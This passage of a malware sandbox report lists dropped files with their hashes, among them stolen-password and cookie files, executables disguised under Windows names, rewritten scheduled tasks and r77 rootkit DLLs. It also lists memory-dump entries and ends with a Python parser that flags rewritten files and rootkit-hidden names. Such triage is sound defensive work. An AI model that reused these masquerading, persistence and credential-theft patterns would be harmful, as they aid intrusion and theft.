SHA256 f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA512 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

MD5 2538ec9e8425a905937573069b77d4c2
SHA1 ad0c2b7aff4382e23444d26adac96d9697b849f3
SHA256 29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e
SHA512 a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 eb51755b637423154d1341c6ee505f50
SHA1 d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256 db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512 e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe

MD5 a776e68f497c996788b406a3dc5089eb
SHA1 45bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA512 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

C:\Users\Admin\AppData\Local\Temp\splwow64.exe

MD5 0d8360781e488e250587a17fbefa646c
SHA1 29bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256 ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

memory/4348-218-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4348-222-0x000000006F730000-0x000000006F740000-memory.dmp

memory/4348-227-0x00000000006E0000-0x0000000000702000-memory.dmp

memory/4348-230-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hh.exe

MD5 4d4c98eca32b14aeb074db34cd0881e4
SHA1 92f213d609bba05d41d6941652a88c44936663a4
SHA256 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

memory/4348-221-0x00000000006E0000-0x0000000000702000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cookies3

MD5 fd1cd719731a16bb2c7d4e7ff2ad0032
SHA1 9b7bbc8f369c8a9b854696e1c3188224789b7c0b
SHA256 b5101ea84e30f9a33db887c27cfeb7b8344ad0e8f93e0f2cd52329443d5d4613
SHA512 9d264dc1efaaff1303362d5686759de58ecdb4ae99f49f0b8319c54f063230ea1dfb53bfc3e618b82aaf816b994ccb89a0e4a25b7d734f2f624ac70f539850d0

C:\Users\Admin\AppData\Local\Temp\Cookies1

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/3480-240-0x0000000140000000-0x0000000140040000-memory.dmp

memory/668-247-0x00000108BDD10000-0x00000108BDD3A000-memory.dmp

memory/380-253-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/380-252-0x0000019C64790000-0x0000019C647BA000-memory.dmp

memory/920-261-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/1156-273-0x0000012E87050000-0x0000012E8707A000-memory.dmp

memory/1156-274-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/1132-271-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/1132-270-0x0000028413960000-0x000002841398A000-memory.dmp

memory/996-268-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/996-267-0x0000017A49660000-0x0000017A4968A000-memory.dmp

memory/920-260-0x000002588E6A0000-0x000002588E6CA000-memory.dmp

memory/736-258-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/736-257-0x000001D726B90000-0x000001D726BBA000-memory.dmp

memory/668-248-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/612-244-0x00007FFF4BD30000-0x00007FFF4BD40000-memory.dmp

memory/612-243-0x000001C7E7CA0000-0x000001C7E7CCA000-memory.dmp

memory/612-242-0x000001C7E7860000-0x000001C7E7883000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 91128da441ad667b8c54ebeadeca7525
SHA1 24b5c77fb68db64cba27c338e4373a455111a8cc
SHA256 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512 bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd

C:\Users\Admin\AppData\Local\Temp\xwizard.exe

MD5 df991217f1cfadd9acfa56f878da5ee7
SHA1 0b03b34cfb2985a840db279778ca828e69813116
SHA256 deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

C:\Users\Admin\AppData\Local\Temp\xwizard.cfg

MD5 ae8eed5a6b1470aec0e7fece8b0669ef
SHA1 ca0e896f90c38f3a8bc679ea14c808726d8ef730
SHA256 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e
SHA512 e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6

C:\Users\Admin\AppData\Local\Temp\bhvE85C.tmp

MD5 05832cd24a350bd56653c6b8e5c3261b
SHA1 732ac434acbb0435e1b19dc2c5083b325d0fd682
SHA256 7e211d358d3429e4cdb9c7c6b1a5178d3f7874769dfc4c7d2b5d345e518b2e60
SHA512 0fd73d72feb4fc99894e00529992b0af85b26ba73b0afef689a9b996ca172e809cb0344c56364aa3f727394e950895e6b9ec58590c9e12427d221aed6396e579

C:\Users\Admin\AppData\Local\Temp\whysosad

MD5 fc3c88c2080884d6c995d48e172fbc4f
SHA1 cb1dcc479ad2533f390786b0480f66296b847ad3
SHA256 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA512 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll

MD5 f876b8ce91d572547ea79104f3f24f48
SHA1 a154133be4547d099f4aefb9a5abbd55b02649be
SHA256 c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c
SHA512 f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee

C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll

MD5 ecfb232ae47a07667a5850104ebebe26
SHA1 53db1507d46209797cad3d4029964cdfea708d8e
SHA256 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a
SHA512 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77Stellacy.exe.log

MD5 2362dcc9d262d0969898b143fb7fc91a
SHA1 2240860a675c86425f5702b501eac121bfb744eb
SHA256 4f7cff601d97caf1e0040bc2d63ccadd27294b2e551ff4167e0b080c69a915b0
SHA512 59cb7e53dc9cc02f25216cc87115403ed67fb5d24947ef2e803cd54e9f118d5d65a71817b05642c238ca48eb7bfd228d008d92e42023f2c15755c64c88f5b0d6
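The listing above is raw sandbox output; what a responder does with it is turn it into structured indicators and look for patterns the flat list hides. The Python below is an added example, not part of the sandbox report, that parses this section's "path / MD5 / SHA1 / SHA256 / SHA512" blocks and the "memory/<pid>-<n>-<start>-<end>-memory.dmp" lines from a constructed excerpt (paths and hashes copied from the entries above, SHA512 lines dropped for brevity) and applies two checks worth running on any such report: the same path listed with more than one SHA256 (compile.bat, and each of the UpdateOrchestrator task files, appear twice with different hashes, meaning the file was rewritten during detonation), and file names carrying the "$77" prefix, which is the hide prefix used by the r77 rootkit whose r77-x64.dll and r77-x86.dll are dropped above. The function names, the excerpt and the region grouping are the example's own.

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's own "Files" listing format. Paths and
# hashes are copied from the report above; SHA512 lines are omitted here for
# brevity (the parser accepts them when present).
SAMPLE_LISTING = r"""
memory/4764-178-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 eb51755b637423154d1341c6ee505f50
SHA1 d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256 db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

memory/4764-181-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compile.bat

MD5 91128da441ad667b8c54ebeadeca7525
SHA1 24b5c77fb68db64cba27c338e4373a455111a8cc
SHA256 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77Stellacy.exe.log

MD5 2362dcc9d262d0969898b143fb7fc91a
SHA1 2240860a675c86425f5702b501eac121bfb744eb
SHA256 4f7cff601d97caf1e0040bc2d63ccadd27294b2e551ff4167e0b080c69a915b0
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$"
)
R77_PREFIX = "$77"  # r77 rootkit hides files/processes whose name starts with this


def parse_listing(text):
    """Return (files, dumps): dropped-file entries and memory-dump regions."""
    files, dumps = [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            start, end = int(start, 16), int(end, 16)
            dumps.append({"pid": int(pid), "seq": int(seq),
                          "start": start, "end": end, "size": end - start})
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:  # hash line belongs to the open entry
                current["hashes"][m.group(1).upper()] = m.group(2).lower()
            continue
        # Anything else is a dropped-file path that opens a new entry.
        current = {"path": line, "hashes": {}}
        files.append(current)
    return files, dumps


def basename(path):
    return re.split(r"[\\/]", path)[-1]


def rewritten_paths(files):
    """Paths reported with more than one distinct SHA256 (file rewritten)."""
    seen = defaultdict(set)
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha:
            seen[f["path"]].add(sha)
    return {p: sorted(s) for p, s in seen.items() if len(s) > 1}


def r77_hidden(files):
    """Paths whose file name carries the r77 hide prefix."""
    return [f["path"] for f in files if basename(f["path"]).startswith(R77_PREFIX)]


def regions_by_pid(dumps):
    """Distinct dumped (start, end) ranges per PID, so repeats collapse."""
    out = defaultdict(set)
    for d in dumps:
        out[d["pid"]].add((d["start"], d["end"]))
    return {pid: sorted(r) for pid, r in out.items()}


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE_LISTING)
    for path, shas in rewritten_paths(files).items():
        print("rewritten:", path, shas)
    for path in r77_hidden(files):
        print("r77-prefixed:", path)
    for pid, regions in regions_by_pid(dumps).items():
        print("pid", pid, [f"0x{s:x}-0x{e:x} ({e - s} bytes)" for s, e in regions])
```

Feed it the whole Files section of the report instead of the excerpt and the rewritten-path check will also surface the four UpdateOrchestrator task files, each listed twice with different hashes; the region grouping shows that pid 4764's repeated 0x400000-0x434000 dumps are one 0x34000-byte image captured several times, not several regions.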